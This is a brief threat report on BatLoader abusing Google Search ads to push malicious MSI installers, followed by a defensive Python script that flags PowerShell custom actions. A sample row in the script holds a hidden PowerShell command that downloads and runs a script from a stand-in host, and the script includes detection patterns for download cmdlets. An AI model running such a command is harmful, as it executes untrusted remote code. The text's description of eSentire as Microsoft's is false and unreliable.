BatLoader Continues to Abuse Google Search Ads
released on 2023-03-15 @ 05:49:51 PM
In December, Microsoft's eSentire published a summary of BatLoader activity in which Google Search Ads impersonating software such as WinRAR were used to deliver malicious Windows Installer files. The installer files contained custom actions that used PowerShell commands to download and execute payloads (Redline Stealer, Ursnif, etc.) hosted on legitimate websites.
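A static triage check for the installer behaviour described above, as an added example that is not code from the eSentire report: it scans an MSI `CustomAction` table for actions that launch PowerShell and fetch remote content. It assumes the table has already been exported to IDT text; the sample rows, action names and the `example.invalid` URL are constructed for illustration.

```python
import re

# Constructed sample: a CustomAction table in IDT text form (the tab-separated
# export of an MSI table). Rows are invented for illustration.
SAMPLE_IDT = "\n".join([
    "Action\tType\tSource\tTarget\tExtendedType",
    "s72\ti2\tS72\tS255\tI4",
    "CustomAction\tAction",
    "SetInstallDir\t51\tINSTALLDIR\t[ProgramFilesFolder]Demo\t",
    'RunHelper\t3106\tSystemFolder\tpowershell.exe -w hidden -c "iwr https://example.invalid/u.ps1 | iex"\t',
    "LaunchReadme\t226\tINSTALLDIR\tnotepad.exe readme.txt\t",
])

EXE_TYPES = {2, 18, 34, 50}                      # base types that launch an executable
SCRIPT_TYPES = {5, 6, 21, 22, 37, 38, 53, 54}    # JScript / VBScript base types
IN_SCRIPT, NO_IMPERSONATE = 0x400, 0x800         # deferred execution / no user impersonation

PS_RE = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)
FETCH_RE = re.compile(
    r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
    r"downloadfile|start-bitstransfer)\b|https?://", re.I)

def parse_idt(text):
    """Return table rows as dicts; the first three IDT lines are headers."""
    lines = text.splitlines()
    cols = lines[0].split("\t")
    rows = []
    for line in lines[3:]:
        if line.strip():
            vals = line.split("\t")
            rows.append(dict(zip(cols, vals + [""] * (len(cols) - len(vals)))))
    return rows

def triage(rows):
    """Flag custom actions that run PowerShell, noting remote fetches."""
    findings = []
    for row in rows:
        ctype = int(row["Type"])
        base = ctype & 0x3F                      # low 6 bits select the action kind
        text = f'{row["Source"]} {row["Target"]}'
        if base not in EXE_TYPES | SCRIPT_TYPES or not PS_RE.search(text):
            continue
        flags = IN_SCRIPT | NO_IMPERSONATE
        findings.append({
            "action": row["Action"],
            "base_type": base,
            "deferred_no_impersonate": (ctype & flags) == flags,
            "severity": "high" if FETCH_RE.search(text) else "review",
        })
    return findings

if __name__ == "__main__":
    for finding in triage(parse_idt(SAMPLE_IDT)):
        print(finding)
```

Rows flagged `deferred_no_impersonate` deserve the closest look, since such actions run without impersonating the installing user.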